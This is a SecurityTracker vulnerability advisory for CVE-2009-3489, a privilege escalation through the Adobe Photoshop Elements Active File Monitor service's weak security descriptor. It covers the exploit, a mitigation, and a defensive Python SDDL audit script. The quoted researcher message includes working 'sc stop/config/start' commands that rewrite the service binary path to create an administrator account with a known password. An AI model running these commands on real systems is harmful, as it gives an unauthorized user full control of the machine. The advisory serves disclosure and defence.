SecurityTracker.com
Category:   Application (Generic)  >   Adobe Photoshop
Vendors:   Adobe Systems Incorporated
Adobe Photoshop Elements Lets Local Users Gain Elevated Privileges
SecurityTracker Alert ID:  1022963
SecurityTracker URL:  http://securitytracker.com/id/1022963
CVE Reference:   CVE-2009-3489
Updated:  Nov 11 2009
Original Entry Date:  Sep 30 2009
Impact:   Execution of arbitrary code via local system, Root access via local system
Vendor Confirmed:  Yes
Exploit Included:  Yes
Version(s): Elements 7.0, 8.0
Description:   A vulnerability was reported in Adobe Photoshop Elements. A local user can obtain elevated privileges on the target system.

The Adobe Active File Monitor service is installed with an unsafe security descriptor. A local user in the 'Users' group can stop the service, use the 'sc config' command to replace the service's binary path with an arbitrary value, and then restart the service to execute arbitrary code with System privileges.

The original advisory is available at:

http://retrogod.altervista.org/9sg_adobe_pe_local.html

Nine:Situations:Group::bellick reported this vulnerability.

Impact:   A local user can obtain System privileges on the target system.
Solution:   No solution was available at the time of this entry.

The vendor has described a workaround in their advisory.

The vendor's advisory is available at:

http://www.adobe.com/support/security/bulletins/apsb09-17.html

Vendor URL:  www.adobe.com/support/security/bulletins/apsb09-17.html
Cause:   Configuration error
Underlying OS:  Windows (Any)

Message History:   None.


 Source Message Contents

Subject:  Adobe Photoshop Elements 8.0 Active File Monitor Service Bad

Adobe Photoshop Elements 8.0 Active File Monitor Service Bad Security Descriptor Local Elevation Of Privileges
by Nine:Situations:Group::bellick
site: http://retrogod.altervista.org/

Tested on Microsoft Windows XP SP3

The "Adobe Active File Monitor V8" service is installed with an improper security descriptor.
A malicious user of the Users group (which on xp means a "limited account") can stop the service,
then invoke the "sc config" command to replace the binary path with a value of choice, then restart
the service to run the command with SYSTEM privileges ex., run these commands as a limited user:

sc stop "AdobeActiveFileMonitor8.0"
sc config "AdobeActiveFileMonitor8.0" binPath= "cmd /c net user adobe kills /add && net localgroup Administrators adobe /add"
sc start "AdobeActiveFileMonitor8.0"
runas /noprofile /user:%COMPUTERNAME%\adobe cmd

now login as administrator with password "kills"

mitigation:

the security descriptor of the service is like this:

C:\>sc sdshow "AdobeActiveFileMonitor8.0"

D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)(A;;CCLCSWLOCRRC;;;AU)(A;;CCLCSWRPWPDTLOCRRC;;;PU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)

note the WO and WD permission for Everyone (!!!!!)

change the security descriptor like the following:

C:\>sc sdset "AdobeActiveFileMonitor8.0" D:(A;;CCLCSWLOCRRC;;;AU)(A;;CCLCSWRPLOCRRC;;;PU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)(A;;CCLCSWRPWPDTLOCRRC;;;SY)
[SC] SetServiceObjectSecurity SUCCESS

readings, interesting article:
http://msmvps.com/blogs/erikr/archive/2007/09/26/set-permissions-on-a-specific-service-windows.aspx

original url: http://retrogod.altervista.org/9sg_adobe_pe_local.html
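
An added example, not part of the SecurityTracker entry or the original advisory: a small Python audit that parses a service SDDL string as printed by "sc sdshow" and reports which low-privileged trustees hold rights that permit the binary path replacement described above. The function names and the LOW_PRIV trustee list are assumptions of this example; the two descriptors are the ones quoted in the message.

```python
import re

# SDDL two-letter codes as they apply to service objects -> access-mask bit.
RIGHTS = {
    "CC": 0x1, "DC": 0x2, "LC": 0x4, "SW": 0x8, "RP": 0x10, "WP": 0x20,
    "DT": 0x40, "LO": 0x80, "CR": 0x100,
    "SD": 0x10000, "RC": 0x20000, "WD": 0x40000, "WO": 0x80000,
    "GA": 0x10000000, "GX": 0x20000000, "GW": 0x40000000, "GR": 0x80000000,
}
# Rights that let the holder change binPath, or grant themselves that right.
DANGEROUS = {
    "SERVICE_CHANGE_CONFIG": 0x2,   # DC: what 'sc config ... binPath=' needs
    "WRITE_DAC": 0x40000,           # WD: rewrite the DACL
    "WRITE_OWNER": 0x80000,         # WO: take ownership
    "GENERIC_WRITE": 0x40000000,    # includes SERVICE_CHANGE_CONFIG
    "GENERIC_ALL": 0x10000000,      # SERVICE_ALL_ACCESS
}
# Assumption: trustees treated as unprivileged (SDDL aliases and equivalent SIDs).
LOW_PRIV = {"WD", "AU", "BU", "IU", "AN", "BG", "PU",
            "S-1-1-0", "S-1-5-11", "S-1-5-32-545", "S-1-5-4"}
# The two descriptors quoted in the advisory: as installed, and after sdset.
VULNERABLE = "D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)(A;;CCLCSWLOCRRC;;;AU)(A;;CCLCSWRPWPDTLOCRRC;;;PU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)"
FIXED = "D:(A;;CCLCSWLOCRRC;;;AU)(A;;CCLCSWRPLOCRRC;;;PU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)(A;;CCLCSWRPWPDTLOCRRC;;;SY)"

def rights_mask(rights):
    """Convert an ACE rights field (hex mask or two-letter codes) to a mask."""
    if rights.lower().startswith("0x"):
        return int(rights, 16)
    # Each code is a distinct bit, so summing the unique codes equals OR-ing them.
    return sum(RIGHTS[c] for c in set(re.findall("..", rights)))

def risky_aces(sddl):
    """Return {trustee: [dangerous rights]} for allow-ACEs in the DACL only."""
    dacl = re.search(r"D:[^()]*((?:\([^)]*\))+)", sddl)
    findings = {}
    for ace in re.findall(r"\(([^)]*)\)", dacl.group(1) if dacl else ""):
        fields = ace.split(";")  # type;flags;rights;object;inherit;trustee
        if len(fields) < 6 or fields[0] != "A" or fields[5] not in LOW_PRIV:
            continue
        mask = rights_mask(fields[2])
        hits = [name for name, bit in DANGEROUS.items() if mask & bit]
        if hits:
            findings.setdefault(fields[5], []).extend(hits)
    return findings

if __name__ == "__main__":
    for label, sd in (("installed", VULNERABLE), ("after sdset", FIXED)):
        print(label, risky_aces(sd))
```

In the rights field "WD" means WRITE_DAC, while in the trustee field "WD" means Everyone; the parser keeps the two apart by field position.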

 
 



Copyright 2019, SecurityGlobal.net LLC